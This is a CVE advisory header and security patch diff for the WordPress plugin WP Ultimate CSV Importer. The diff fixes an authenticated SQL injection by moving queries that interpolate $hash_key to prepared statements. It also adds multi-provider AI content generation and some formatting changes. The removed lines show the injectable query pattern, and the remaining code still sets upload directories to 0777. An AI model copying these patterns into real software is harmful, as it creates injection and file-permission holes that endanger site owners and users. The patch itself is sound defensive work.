CVE-2026-1317: WP Import – Ultimate CSV XML Importer for WordPress <= 7.37 – Authenticated (Subscriber+) SQL Injection via File Name (wp-ultimate-csv-importer)

--- a/wp-ultimate-csv-importer/SaveMapping.php
+++ b/wp-ultimate-csv-importer/SaveMapping.php
@@ -1341,7 +1341,7 @@
 		if ($rollback_option == 'true') {
 			$response['rollback'] = true;
 		}
-		$total_records = $wpdb->get_results("SELECT status FROM $log_table_name WHERE hash_key = '$hash_key' ", ARRAY_A);
+		$total_records = $wpdb->get_results($wpdb->prepare("SELECT status FROM $log_table_name WHERE hash_key = %s ", $hash_key), ARRAY_A);
 		if ($total_records[0]['status'] == 'Completed') {
 			if (get_option('failed_line_number')) {
 				delete_option('failed_line_number');
@@ -1399,13 +1399,13 @@

 		$response = [];

-		$background_values = $wpdb->get_results("SELECT mapping , module  FROM $template_table_name WHERE `eventKey` = '$hash_key' ");
+		$background_values = $wpdb->get_results($wpdb->prepare("SELECT mapping , module  FROM $template_table_name WHERE `eventKey` = %s ", $hash_key));
 		foreach ($background_values as $values) {
 			$mapped_fields_values = $values->mapping;
 			$selected_type = $values->module;
 		}

-		$get_id = $wpdb->get_results("SELECT id , mode ,file_name , total_rows FROM $file_table_name WHERE `hash_key` = '$hash_key'");
+		$get_id = $wpdb->get_results($wpdb->prepare("SELECT id , mode ,file_name , total_rows FROM $file_table_name WHERE `hash_key` = %s", $hash_key));
 		$get_mode = $get_id[0]->mode;
 		$total_rows = $get_id[0]->total_rows;
 		$file_name = $get_id[0]->file_name;
@@ -1690,7 +1690,7 @@

 		$log_manager_instance->manage_records($hash_key, $selected_type, $file_name, $total_rows);

-		$count = count($info);
+		$count = (is_array($info) || $info instanceof Countable) ? count($info) : 0;

 		for ($i = 1; $i <= $count; $i++) {

--- a/wp-ultimate-csv-importer/controllers/SendPassword.php
+++ b/wp-ultimate-csv-importer/controllers/SendPassword.php
@@ -85,10 +85,7 @@
 		// Fetch settings safely
 		$result['setting'] = get_option( 'openAI_settings' );

-		// Return as proper JSON response
-		wp_send_json_success( $result );
-
-		// End execution safely
+		echo wp_json_encode($result);
 		wp_die();

 	}
@@ -101,23 +98,29 @@
 	public function showOptions() {
 		check_ajax_referer('smack-ultimate-csv-importer', 'securekey');

-		$json = isset($_POST['data']) ? wp_unslash($_POST['data']) : '';
+		$prefixValue = isset($_POST['prefixValue']) ? sanitize_text_field($_POST['prefixValue']) : '';

-  		// Decode JSON
-    	$data = json_decode($json, true);
+		if ($prefixValue === 'delete') {
+			delete_option('openAI_settings');
+			$result['success'] = true;
+			echo wp_json_encode($result);
+			wp_die();
+		}

-    	// Sanitize the value
-    	$apikey = isset($data['apikey']) ? sanitize_text_field($data['apikey']) : '';
-		update_option('openAI_settings', $apikey);
+		$json = isset($_POST['data']) ? wp_unslash($_POST['data']) : '';
+		$data = json_decode($json, true);

-		if(!empty($apikey )){
-			update_option('openAI_settings', $apikey);
-		}
-		if(!empty($apikey )){
-			if($apikey == 'delete'){
-				delete_option('openAI_settings');
-			}
+		if (is_array($data)) {
+			$settings = [
+				'ai' => isset($data['ai']) ? sanitize_text_field($data['ai']) : 'chatgpt',
+				'apikey' => isset($data['apikey']) ? sanitize_text_field($data['apikey']) : '',
+				'model' => isset($data['model']) ? sanitize_text_field($data['model']) : '',
+				'enabled' => isset($data['enabled']) ? (bool)$data['enabled'] : false,
+			];
+
+			update_option('openAI_settings', json_encode($settings));
 		}
+
 		$ucisettings = get_option('sm_uci_pro_settings');
 		foreach ($ucisettings as $key => $val) {
 			$settings[$key] = json_decode($val);
--- a/wp-ultimate-csv-importer/importExtensions/CoreFieldsImport.php
+++ b/wp-ultimate-csv-importer/importExtensions/CoreFieldsImport.php
@@ -1067,8 +1067,9 @@
 			if (strpos($innerKey, '->openAI') !== false) {
 				$OpenAIHelper = new OpenAIHelper;
 				$newKey = str_replace('->openAI', '', $innerKey);
-				$data_array[$newKey] = $OpenAIHelper->generateContent($innerValue);
-
+				$numKey = $newKey . '->num';
+				$maxWords = isset($data_array[$numKey]) ? intval($data_array[$numKey]) : 0;
+				$data_array[$newKey] = $OpenAIHelper->generateContent($innerValue, $maxWords);
 			}

 			if (stripos($innerKey, 'openAI') !== false) {
--- a/wp-ultimate-csv-importer/importExtensions/OpenAIHelper.php
+++ b/wp-ultimate-csv-importer/importExtensions/OpenAIHelper.php
@@ -15,14 +15,49 @@
     private $apiKey;
     private $baseUrl = 'https://api.openai.com/v1/chat/completions';
     private $image_baseUrl = 'https://api.openai.com/v1/images/generations';
-    public function generateContent($prompt) {
-        $get_key =get_option('openAI_settings');
-        $this->apiKey = $get_key;
+    public function generateContent($prompt, $maxWords = 0) {
+        $settings = get_option('openAI_settings');
+
+        // Handle legacy string settings or new JSON settings
+        if (is_string($settings) && $json = json_decode($settings, true)) {
+            if (isset($json['ai'])) {
+                $settings = $json;
+            } else {
+                // It might be a JSON but not our settings structure, or just a key
+                // If it's just a key, treat as legacy OpenAI
+                $settings = ['ai' => 'chatgpt', 'apikey' => $settings, 'model' => 'gpt-3.5-turbo'];
+            }
+        } elseif (is_string($settings)) {
+             $settings = ['ai' => 'chatgpt', 'apikey' => $settings, 'model' => 'gpt-3.5-turbo'];
+        }
+
+        $provider = isset($settings['ai']) ? $settings['ai'] : 'chatgpt';
+        $this->apiKey = isset($settings['apikey']) ? $settings['apikey'] : '';
+        $model = isset($settings['model']) ? $settings['model'] : '';
+
+        if (empty($this->apiKey)) {
+            return false;
+        }
+
+        switch ($provider) {
+            case 'gemini':
+                return $this->generateGeminiContent($prompt, $model, $maxWords);
+            case 'claude':
+                return $this->generateClaudeContent($prompt, $model, $maxWords);
+            case 'chatgpt':
+            default:
+                return $this->generateOpenAIContent($prompt, $model, $maxWords);
+        }
+    }

+    private function generateOpenAIContent($prompt, $model, $maxWords = 0) {
+        $model = $model ?: 'gpt-3.5-turbo';
+        if ($maxWords > 0) {
+            $prompt .= " The response must be approximately $maxWords words long. Do not include the word count or any meta-information about the length in the output.";
+        }
         $data = [
             'messages' => [['role' => 'user', 'content' => $prompt]],
-            'model' => 'gpt-3.5-turbo',
-            'max_tokens' => $maxCharacters,
+            'model' => $model,
         ];

         $headers = [
@@ -33,19 +68,98 @@
         $response = wp_remote_post($this->baseUrl, array(
             'body' => json_encode($data),
             'headers' => $headers,
+            'timeout' => 60,
+        ));
+
+        return $this->processResponse($response, 'openai');
+    }
+
+    private function generateGeminiContent($prompt, $model, $maxWords = 0) {
+        $model = $model ?: 'gemini-flash-latest';
+        if ($maxWords > 0) {
+            $prompt .= " The response must be approximately $maxWords words long. Do not include the word count or any meta-information about the length in the output.";
+        }
+        $url = "https://generativelanguage.googleapis.com/v1beta/models/{$model}:generateContent?key=" . $this->apiKey;
+
+        $data = [
+            'contents' => [
+                [
+                    'parts' => [
+                        ['text' => $prompt]
+                    ]
+                ]
+            ]
+        ];
+
+        $headers = [
+            'Content-Type' => 'application/json',
+        ];
+
+        $response = wp_remote_post($url, array(
+            'body' => json_encode($data),
+            'headers' => $headers,
+            'timeout' => 60,
+        ));
+
+        return $this->processResponse($response, 'gemini');
+    }
+
+    private function generateClaudeContent($prompt, $model, $maxWords = 0) {
+        $model = $model ?: 'claude-3-opus-20240229';
+        if ($maxWords > 0) {
+            $prompt .= " The response must be approximately $maxWords words long. Do not include the word count or any meta-information about the length in the output.";
+        }
+        $url = 'https://api.anthropic.com/v1/messages';
+
+        $data = [
+            'model' => $model,
+            'max_tokens' => 1024,
+            'messages' => [
+                ['role' => 'user', 'content' => $prompt]
+            ]
+        ];
+
+        $headers = [
+            'x-api-key' => $this->apiKey,
+            'anthropic-version' => '2023-06-01',
+            'content-type' => 'application/json',
+        ];
+
+        $response = wp_remote_post($url, array(
+            'body' => json_encode($data),
+            'headers' => $headers,
+            'timeout' => 60,
         ));

+        return $this->processResponse($response, 'claude');
+    }
+
+    private function processResponse($response, $provider) {
+        if (is_wp_error($response)) {
+            return "Error: " . $response->get_error_message();
+        }
+
         $httpCode = wp_remote_retrieve_response_code($response);
-        $decodedResponse = json_decode(wp_remote_retrieve_body($response), true);
-        if (isset($httpCode) && $httpCode != 200) {
-            return $httpCode;
-        }
-        if (isset($decodedResponse['choices'][0]['message']['content'])) {
-            return $decodedResponse['choices'][0]['message']['content'];
-        } else {
-            return false;
+        $body = wp_remote_retrieve_body($response);
+        $decodedResponse = json_decode($body, true);
+
+        if ($httpCode != 200) {
+            // Log error or return code
+            return "Error ($httpCode): " . $body;
+        }
+
+        switch ($provider) {
+            case 'openai':
+                return isset($decodedResponse['choices'][0]['message']['content']) ? $decodedResponse['choices'][0]['message']['content'] : false;
+            case 'gemini':
+                return isset($decodedResponse['candidates'][0]['content']['parts'][0]['text']) ? $decodedResponse['candidates'][0]['content']['parts'][0]['text'] : false;
+            case 'claude':
+                return isset($decodedResponse['content'][0]['text']) ? $decodedResponse['content'][0]['text'] : false;
+            default:
+                return false;
         }
     }
+
     public function generateImage($prompt) {
         $get_key =get_option('openAI_settings');
         $this->apiKey = $get_key;
--- a/wp-ultimate-csv-importer/languages/LangEN.php
+++ b/wp-ultimate-csv-importer/languages/LangEN.php
@@ -32,7 +32,7 @@
                 'Backupineditableformatdesc' => 'Backup in 4 different file formats like CSV, XML, JSON,XLS.',
                 'AutoScheduledBackups' => 'Auto Scheduled Backups',
                 'AutoScheduledBackupsdesc' => 'Scheduled export helps backup as editable text file format in regular interval.',
-                'AutoSchedulewithreusabletemplates' => 'Want to know how the import works, how to verify each import, and what to do afterward? Check out the comprehensive documentation for WP Ultimate CSV Importer to learn more.',
+                'AutoSchedulewithreusabletemplates' => 'Create advanced import rules & conditional logic',
                 'Dashboard' => 'Dashboard',
                 'Manager' => 'Manager',
                 'csv_importlink' => 'click here',
@@ -184,11 +184,11 @@
                 'Thisfeatureisavailable' => 'This feature is available in',
                 'UltimateCSVImporterPro'=> 'Ultimate CSV Importer Pro',
                 'Exporterwithadvancedfilters' => 'Exporter with advanced filters',
-                'Updateolderpostsfromsingleimport' => 'Help & Resources',
-                'JetEngineMetaboxToolsetTypesACFproFreeandPodsFieldPostPluginsImporter'=> 'Join Our Community!',
-                'SEOPluginsDataImporterRankMathYoastandAllinOneSEO' => 'SEO Plugins Data Importer - RankMath, SEOPress, Yoast and All in One SEO',
+                'Updateolderpostsfromsingleimport' => 'Import large files without timeout errors',
+                'JetEngineMetaboxToolsetTypesACFproFreeandPodsFieldPostPluginsImporter'=> 'Import WooCommerce variable products, orders, etc.',
+                'SEOPluginsDataImporterRankMathYoastandAllinOneSEO' => 'Schedule recurring imports via cron jobs',
                 'WarningImportforsomedataaredisabledInstallandactivatebelowpluginsfirst'=> 'Warning: Some addons are missing, it is recommended to',
-                'AIOWooCommerceImportSuit' => 'Connect with fellow users, ask questions, and share your experiences in our CSV Importers Facebook Community. Join us today and become part of a vibrant, supportive network of WP Ultimate CSV Importer users!',
+                'AIOWooCommerceImportSuit' => 'Import JetEngine, ACF, MetaBox, and other custom fields',
                 'PostContentImageOption' => 'Post Content Image Option',
                 'installactivate' => 'to install and activate now',
                 'EnabletodeletetheitemsnotpresentinCSVXMLfile' => 'Enable to remove the elements that are not present in the CSV/XML file',
@@ -210,7 +210,7 @@
                 'Createasupport' => 'Create a support topic here for help',
                 'Exportfiltereddata' => 'Export filtered data',
                 'CreateTopic' => 'Create Topic',
-                'WPMLImporter' => 'WPML Importer',
+                'WPMLImporter' => 'Update existing records without duplicates',
                 'DownloadPostContentExternalImagestoMedia' => 'Download Post Content External Images to Media',
                 'Addcustomsizes' => 'Add custom sizes',
                 'backupineditableformat' => 'backup copy in editable format',
--- a/wp-ultimate-csv-importer/managerExtensions/LogManager.php
+++ b/wp-ultimate-csv-importer/managerExtensions/LogManager.php
@@ -8,13 +8,13 @@
 namespace SmackcodersFCSV;

 if ( ! defined( 'ABSPATH' ) )
-    exit; // Exit if accessed directly
+	exit; // Exit if accessed directly

 class LogManager {

     private static $instance = null,$saveMappingInstance;
-    private static $smack_csv_instance = null;
-    // declare log file and file pointer as private properties
+	private static $smack_csv_instance = null;
+	// declare log file and file pointer as private properties
 	private $log_file, $fp;
 	public $logArr;
 	public function __construct(){
@@ -23,23 +23,23 @@
 		add_action('wp_ajax_download_media_log',array($this,'download_media_log'));
 		add_action('wp_ajax_download_failed_log',array($this,'download_failed_log'));
 		add_action('wp_ajax_delete_log',array($this,'delete_log'));
-    }
+	}

     public static function getInstance() {
 		if (LogManager::$instance == null) {
 			LogManager::$instance = new LogManager;
-            LogManager::$smack_csv_instance = SmackCSV::getInstance();
+			LogManager::$smack_csv_instance = SmackCSV::getInstance();
 			LogManager::$saveMappingInstance = SaveMapping::getInstance();
 			return LogManager::$instance;
 		}
 		return LogManager::$instance;
-    }
+	}


 	/**
 	 * Writes event log in log file.
 	 * @param  string $hash_key - file hash key
-     * @param  string $original_file_name - file name
+	 * @param  string $original_file_name - file name
 	 * @param  string $fileType - file extension
 	 * @param  string $mode - file mode (import or update)
 	 * @param  int    $totalCount - Total number of records
@@ -52,7 +52,7 @@
 		global $logArr;
 		if (is_array($core_log)){
 			$logArr = $core_log;
-			$this->displayLogValue($logArr);
+			$this->displayLogValue($logArr);
 		}
 	}
 	public function displayLogValue(){
@@ -70,7 +70,7 @@
 		$response = [];
 		$logInfo = [];
 		$value = [];
-
+
 		$logInformation = $wpdb->get_results("select * from {$wpdb->prefix}smackuci_events where deletelog = 0 order by id desc ");
 		if(empty($logInformation)){
 			$response['success'] = false;
@@ -85,7 +85,7 @@
 				$updated = $logValue->updated;
 				$skipped = $logValue->skipped;
 				$failed = $logValue->failed;
-
+
 				$logInfo['filename'] = $file_name;
 				$logInfo['revision'] = $revision;
 				$logInfo['module'] = $module;
@@ -93,13 +93,13 @@
 				$logInfo['updated'] = $updated;
 				$logInfo['skipped'] = $skipped;
 				$logInfo['failed'] = $failed;
-
+
 				array_push($value , $logInfo);
 			}
 			$response['success'] = true;
 			$response['info'] = $value;
 			$response['importer_records']=$logArr;
-		}
+		}
 		echo wp_json_encode($response);
 		wp_die();
 	}
@@ -123,21 +123,21 @@
 	}
 	public function delete_log(){
 		check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
-		global $wpdb;
+		global $wpdb;
 		$smack_instance = SmackCSV::getInstance();
 		$filename = sanitize_text_field($_POST['filename']);
-		$revision = sanitize_text_field($_POST['revision']);
+		$revision = sanitize_text_field($_POST['revision']);
 		$upload_path = $smack_instance->create_upload_dir();
-		$get_details = $wpdb->get_results($wpdb->prepare("select id,eventKey from {$wpdb->prefix}smackuci_events where revision = %d and original_file_name = %s", $revision, $filename));
+		$get_details = $wpdb->get_results($wpdb->prepare("select id,eventKey from {$wpdb->prefix}smackuci_events where revision = %d and original_file_name = %s", $revision, $filename));
 		if (!empty($get_details)) {
 			foreach ($get_details as $records) {
-				$eventKey = $records->eventKey;
+				$eventKey = $records->eventKey;
 				$directories = [
 					$upload_path . 'import_logs/' . $eventKey . '/',
 					$upload_path . 'failed_media_logs/' . $eventKey . '/',
 					$upload_path . 'media_logs/' . $eventKey . '/',
 				];
-
+
 				foreach ($directories as $directoryPath) {
 					if (!$this->delete_directory($directoryPath)) {
 						$response['message'] = "File not available. Kindly refresh the page.";
@@ -145,9 +145,9 @@
 						wp_die();
 					}
 				}
-
+
 				$wpdb->update($wpdb->prefix . 'smackuci_events', ['deletelog' => true], ['id' => $records->id]);
-			}
+			}
 			$response['message'] = "Deleted Successfully";
 			echo wp_json_encode($response);
 			wp_die();
@@ -155,10 +155,10 @@
 		else {
 			$response['message'] = "Record not found";
 		}
-
+
 		echo wp_json_encode($response);
 		wp_die();
-	}
+	}

 	/**
 	 * Downloads download_media_log .
@@ -167,18 +167,18 @@
 	// 	check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
 	// 	global $wpdb;
 	// 	$response = [];
-    //     $filename = sanitize_file_name($_POST['filename']);
-    //     $revision = sanitize_text_field($_POST['revision']);
+	//     $filename = sanitize_file_name($_POST['filename']);
+	//     $revision = sanitize_text_field($_POST['revision']);
+
+	//     $upload = wp_upload_dir();
+	//     $upload_dir = $upload['baseurl'];
+	//     $upload_url = $upload_dir . '/smack_uci_uploads/imports/media_logs/';

-    //     $upload = wp_upload_dir();
-    //     $upload_dir = $upload['baseurl'];
-    //     $upload_url = $upload_dir . '/smack_uci_uploads/imports/media_logs/';
-
-    //     $upload_path = LogManager::$smack_csv_instance->create_upload_dir();
+	//     $upload_path = LogManager::$smack_csv_instance->create_upload_dir();
 	// 	$get_event_key = $wpdb->get_results($wpdb->prepare("SELECT eventKey FROM {$wpdb->prefix}smackuci_events WHERE revision = %d AND original_file_name = %s", $revision , $filename));
 	// 	if(empty($get_event_key)) {
 	// 		$response['success'] = false;
-    //         $response['message'] = 'Log not exists';
+	//         $response['message'] = 'Log not exists';
 	// 	}
 	// 	else {
 	// 		$logPath = $upload_path.'media_logs'.'/'.$get_event_key[0]->eventKey .'/';
@@ -186,115 +186,115 @@
 	// 			$loglink = $upload_url .$get_event_key[0]->eventKey .'/'.'media_log.csv';
 	// 			$response['success'] = true;
 	// 			$response['media_log_link'] = $loglink;
-
+
 	// 		else :
 	// 			$response['success'] = false;
 	// 			$response['message'] = 'Log not exists';
-
+
 	// 		endif;
 	// 	}
-    //     echo wp_json_encode($response);
-    //     wp_die();
+	//     echo wp_json_encode($response);
+	//     wp_die();
 	// }
 	public function download_media_log(){
 		check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
-
-	global $wpdb;
-
-	$response = [];
-	$filename = sanitize_file_name($_POST['filename']);
-	$revision = isset($_POST['revision']) ? sanitize_text_field($_POST['revision']) : '';
+
+		global $wpdb;
+
+		$response = [];
+		$filename = sanitize_file_name($_POST['filename']);
+		$revision = isset($_POST['revision']) ? sanitize_text_field($_POST['revision']) : '';
 	$hash_key=isset($_POST['hashkey'] ) ? sanitize_text_field($_POST['hashkey']) : '';
 		if(empty($hash_key)){
 			$event_key_result = $wpdb->get_results($wpdb->prepare("SELECT eventKey FROM {$wpdb->prefix}smackuci_events WHERE revision = %d AND original_file_name = %s", $revision, $filename));
-		$get_event_key = $event_key_result[0]->eventKey;
-
+			$get_event_key = $event_key_result[0]->eventKey;
+
 		}
 		else{
 			$get_event_key=$hash_key;
 		}
-
-	if (empty($get_event_key)) {
-		$response['success'] = false;
-		$response['message'] = 'Log not exists';
-		echo wp_json_encode($response);
-		wp_die();
-	} else {

-		$upload_dir = WP_CONTENT_DIR . '/uploads/smack_uci_uploads/media_log/' . $get_event_key . '/';
-
-		if (!is_dir($upload_dir)) {
-			if (!wp_mkdir_p($upload_dir)) {
-				return null;
+		if (empty($get_event_key)) {
+			$response['success'] = false;
+			$response['message'] = 'Log not exists';
+			echo wp_json_encode($response);
+			wp_die();
+		} else {
+
+			$upload_dir = WP_CONTENT_DIR . '/uploads/smack_uci_uploads/media_log/' . $get_event_key . '/';
+
+			if (!is_dir($upload_dir)) {
+				if (!wp_mkdir_p($upload_dir)) {
+					return null;
+				}
 			}
-		}
-		chmod($upload_dir, 0777);
-
-		$index_file = $upload_dir . 'index.php';
-		if (!file_exists($index_file)) {
-			$index_content = '<?php' . PHP_EOL . '?>';
-			file_put_contents($index_file, $index_content);
-			chmod($index_file, 0644);
-		}
+			chmod($upload_dir, 0777);

-		$baseFileName = 'Media_log';
-		$export_type = 'csv';
-		$file_path = $upload_dir . $baseFileName . '.' . $export_type;
-		$file_url = network_home_url() . '/wp-content/uploads/smack_uci_uploads/media_log/' . $get_event_key . '/' . $baseFileName . '.' . $export_type;
+			$index_file = $upload_dir . 'index.php';
+			if (!file_exists($index_file)) {
+				$index_content = '<?php' . PHP_EOL . '?>';
+				file_put_contents($index_file, $index_content);
+				chmod($index_file, 0644);
+			}

-
+			$baseFileName = 'Media_log';
+			$export_type = 'csv';
+			$file_path = $upload_dir . $baseFileName . '.' . $export_type;
+			$file_url = network_home_url() . '/wp-content/uploads/smack_uci_uploads/media_log/' . $get_event_key . '/' . $baseFileName . '.' . $export_type;

-		if (file_exists($file_path)) {
-			// If the file already exists, return the file URL
-			$response['success'] = true;
-			$response['file_url'] = $file_url;
-			echo wp_json_encode($response);
-			wp_die();
-
-		} else {
-
-
-			$results = $wpdb->get_results(
-				$wpdb->prepare(
+
+
+			if (file_exists($file_path)) {
+				// If the file already exists, return the file URL
+				$response['success'] = true;
+				$response['file_url'] = $file_url;
+				echo wp_json_encode($response);
+				wp_die();
+
+			} else {
+
+
+				$results = $wpdb->get_results(
+					$wpdb->prepare(
 						"SELECT  media_id, title, actual_url,file_url,file_name,caption,alt_text,description,status
 					 FROM " . $wpdb->prefix . "failed_media
 					 WHERE event_id = %s",
-					$get_event_key,
-
-				)
-			);
-			$json_posts = wp_json_encode($results);
-			$posts_array = json_decode($json_posts, true);
-
-			if (empty($posts_array)) {
-				$response['success'] = false;
-				$response['message'] = 'No posts found or failed to decode JSON.';
-				echo wp_json_encode($response);
-				wp_die();
-			}
+						$get_event_key,

-			$csv_file = fopen('php://temp', 'w');
-			if (!empty($posts_array)) {
-				fputcsv($csv_file, array_keys($posts_array[0]));
-			}
+					)
+				);
+				$json_posts = wp_json_encode($results);
+				$posts_array = json_decode($json_posts, true);

-			foreach ($posts_array as $post) {
-				fputcsv($csv_file, $post);
-			}
-			rewind($csv_file);
+				if (empty($posts_array)) {
+					$response['success'] = false;
+					$response['message'] = 'No posts found or failed to decode JSON.';
+					echo wp_json_encode($response);
+					wp_die();
+				}
+
+				$csv_file = fopen('php://temp', 'w');
+				if (!empty($posts_array)) {
+					fputcsv($csv_file, array_keys($posts_array[0]));
+				}
+
+				foreach ($posts_array as $post) {
+					fputcsv($csv_file, $post);
+				}
+				rewind($csv_file);

-			$csv_contents = stream_get_contents($csv_file);
-			fclose($csv_file);
+				$csv_contents = stream_get_contents($csv_file);
+				fclose($csv_file);

-			// Save the CSV data to the file
-			file_put_contents($file_path, $csv_contents);
+				// Save the CSV data to the file
+				file_put_contents($file_path, $csv_contents);

-			$response['success'] = true;
-			$response['file_url'] = $file_url;
-			echo wp_json_encode($response);
-			wp_die();
+				$response['success'] = true;
+				$response['file_url'] = $file_url;
+				echo wp_json_encode($response);
+				wp_die();
+			}
 		}
-	}
 	}

 	/**
@@ -304,18 +304,18 @@
 	// 	check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
 	// 	global $wpdb;
 	// 	$response = [];
-    //     $filename = sanitize_file_name($_POST['filename']);
-    //     $revision = sanitize_text_field($_POST['revision']);
+	//     $filename = sanitize_file_name($_POST['filename']);
+	//     $revision = sanitize_text_field($_POST['revision']);

-    //     $upload = wp_upload_dir();
-    //     $upload_dir = $upload['baseurl'];
-    //     $upload_url = $upload_dir . '/smack_uci_uploads/imports/failed_media_logs/';
-
-    //     $upload_path = LogManager::$smack_csv_instance->create_upload_dir();
+	//     $upload = wp_upload_dir();
+	//     $upload_dir = $upload['baseurl'];
+	//     $upload_url = $upload_dir . '/smack_uci_uploads/imports/failed_media_logs/';
+
+	//     $upload_path = LogManager::$smack_csv_instance->create_upload_dir();
 	// 	$get_event_key = $wpdb->get_results($wpdb->prepare("SELECT eventKey FROM {$wpdb->prefix}smackuci_events WHERE revision = %d AND original_file_name = %s", $revision , $filename));
 	// 	if(empty($get_event_key)) {
 	// 		$response['success'] = false;
-    //         $response['message'] = 'Log not exists';
+	//         $response['message'] = 'Log not exists';
 	// 	}
 	// 	else {
 	// 		$logPath = $upload_path .'failed_media_logs'.'/'.$get_event_key[0]->eventKey .'/failed_media_log.csv';
@@ -323,17 +323,17 @@
 	// 			$loglink = $upload_url .$get_event_key[0]->eventKey .'/'.'failed_media_log.csv';
 	// 			$response['success'] = true;
 	// 			$response['failed_log_link'] = $loglink;
-
+
 	// 		else :
 	// 			$response['success'] = false;
 	// 			$response['message'] = 'Log not exists';
-
+
 	// 		endif;
 	// 	}
-    //     echo wp_json_encode($response);
-    //     wp_die();
+	//     echo wp_json_encode($response);
+	//     wp_die();
 	// }
-
+

 	/**
 	 * Downloads file event log.
@@ -341,20 +341,20 @@
 	// public function download_log(){
 	// 	check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
 	// 	global $wpdb;
-
-    //     $response = [];
-    //     $filename = sanitize_file_name($_POST['filename']);
-    //     $revision = sanitize_text_field($_POST['revision']);
-
-    //     $upload = wp_upload_dir();
-    //     $upload_dir = $upload['baseurl'];
-    //     $upload_url = $upload_dir . '/smack_uci_uploads/imports/import_logs/';
-
-    //     $upload_path = LogManager::$smack_csv_instance->create_upload_dir();
+
+	//     $response = [];
+	//     $filename = sanitize_file_name($_POST['filename']);
+	//     $revision = sanitize_text_field($_POST['revision']);
+
+	//     $upload = wp_upload_dir();
+	//     $upload_dir = $upload['baseurl'];
+	//     $upload_url = $upload_dir . '/smack_uci_uploads/imports/import_logs/';
+
+	//     $upload_path = LogManager::$smack_csv_instance->create_upload_dir();
 	// 	$get_event_key = $wpdb->get_results($wpdb->prepare("SELECT eventKey FROM {$wpdb->prefix}smackuci_events WHERE revision = %d AND original_file_name = %s", $revision , $filename));
 	// 	if(empty($get_event_key)) {
 	// 		$response['success'] = false;
-    //         $response['message'] = 'Log not exists';
+	//         $response['message'] = 'Log not exists';
 	// 	}
 	// 	else {
 	// 		$logPath = $upload_path.'import_logs'.'/'.$get_event_key[0]->eventKey .'/';
@@ -363,22 +363,22 @@
 	// 			$loglink = $upload_url .$get_event_key[0]->eventKey .'/'.'summary_log.csv';
 	// 			$response['success'] = true;
 	// 			$response['log_link'] = $loglink;
-
+
 	// 		else :
 	// 			$response['success'] = false;
 	// 			$response['message'] = 'Log not exists';
-
+
 	// 		endif;
 	// 	}
-    //     echo wp_json_encode($response);
-    //     wp_die();
+	//     echo wp_json_encode($response);
+	//     wp_die();
 	// }

 	public function download_log() {
 		check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
-
+
 		global $wpdb;
-
+
 		$response = [];
 		$filename = sanitize_file_name($_POST['filename']);
 		$revision = isset($_POST['revision']) ? sanitize_text_field($_POST['revision']) : '';
@@ -386,8 +386,8 @@
 		$module  = sanitize_text_field($_POST['type']);
 		if(empty($hash_key)){
 			$event_key_result = $wpdb->get_results($wpdb->prepare("SELECT eventKey FROM {$wpdb->prefix}smackuci_events WHERE revision = %d AND original_file_name = %s", $revision, $filename));
-		$get_event_key = $event_key_result[0]->eventKey;
-
+			$get_event_key = $event_key_result[0]->eventKey;
+
 		}
 		else{
 			$get_event_key=$hash_key;
@@ -400,14 +400,14 @@
 		} else {

 			$upload_dir = WP_CONTENT_DIR . '/uploads/smack_uci_uploads/summary_logs/' . $get_event_key . '/';
-
+
 			if (!is_dir($upload_dir)) {
 				if (!wp_mkdir_p($upload_dir)) {
 					return null;
 				}
 			}
 			chmod($upload_dir, 0777);
-
+
 			$index_file = $upload_dir . 'index.php';
 			if (!file_exists($index_file)) {
 				$index_content = '<?php' . PHP_EOL . '?>';
@@ -419,18 +419,18 @@
 			$export_type = 'csv';
 			$file_path = $upload_dir . $baseFileName . '.' . $export_type;
 			$file_url = network_home_url() . '/wp-content/uploads/smack_uci_uploads/summary_logs/' . $get_event_key . '/' . $baseFileName . '.' . $export_type;
-
+
 			if (file_exists($file_path)) {
 				// If the file already exists, return the file URL
 				$response['success'] = true;
 				$response['file_url'] = $file_url;
 				echo wp_json_encode($response);
 				wp_die();
-
+
 			} else {
 				$cat_check = $wpdb->get_results($wpdb->prepare("SELECT * FROM " . $wpdb->prefix . "summary WHERE event_id = %s", $get_event_key));
 				foreach ($cat_check as $item) {
-
+
 					switch (strtolower($item->is_category)) {
 						case '1':
 							$found_category = true;
@@ -439,174 +439,172 @@
 							$found_tag = true;
 							break;

-							case '3':
-								$found_users = true;
-								break;
-								case '4':
-									$found_comment = true;
-									break;
-
+						case '3':
+							$found_users = true;
+							break;
+						case '4':
+							$found_comment = true;
+							break;
+
 					}
-
+
 				}
 				// category log
 				if (isset($found_category) && $found_category){
 					global $wpdb;
-
-						$cat_ids = $wpdb->get_col($wpdb->prepare("SELECT post_id FROM " . $wpdb->prefix . "summary WHERE event_id = %s", $get_event_key));
-
-						if (!empty($cat_ids)) {
-
-							$placeholders = implode(',', array_fill(0, count($cat_ids), '%d'));
-

-							$query = "SELECT * FROM " . $wpdb->prefix . "terms WHERE term_id IN ($placeholders)";
-							$results = $wpdb->get_results($wpdb->prepare($query, ...$cat_ids));
-							foreach ($results as $result) {
-								$term_id = $result->term_id;
-
-								// Admin link
-								$admin_link = admin_url("term.php?taxonomy=category&tag_ID={$term_id}");
-
-								// Weblink
-								$site_url = get_site_url();
+					$cat_ids = $wpdb->get_col($wpdb->prepare("SELECT post_id FROM " . $wpdb->prefix . "summary WHERE event_id = %s", $get_event_key));
+
+					if (!empty($cat_ids)) {
+
+						$placeholders = implode(',', array_fill(0, count($cat_ids), '%d'));
+
+
+						$query = "SELECT * FROM " . $wpdb->prefix . "terms WHERE term_id IN ($placeholders)";
+						$results = $wpdb->get_results($wpdb->prepare($query, ...$cat_ids));
+						foreach ($results as $result) {
+							$term_id = $result->term_id;
+
+							// Admin link
+							$admin_link = admin_url("term.php?taxonomy=category&tag_ID={$term_id}");
+
+							// Weblink
+							$site_url = get_site_url();
 								$term_link = trailingslashit($site_url) . 'index.php/'.'category/' . $result->slug . '/';
-
-								$result->admin_link = $admin_link;
-								$result->weblink = $term_link;
-							}
-
-					}
+
+							$result->admin_link = $admin_link;
+							$result->weblink = $term_link;
+						}
+
+					}
 				}
 				//tag log
 				elseif(isset($found_tag) && $found_tag){
 					global $wpdb;
-
-						$cat_ids = $wpdb->get_col($wpdb->prepare("SELECT post_id FROM " . $wpdb->prefix . "summary WHERE event_id = %s", $get_event_key));
-
-						if (!empty($cat_ids)) {
-
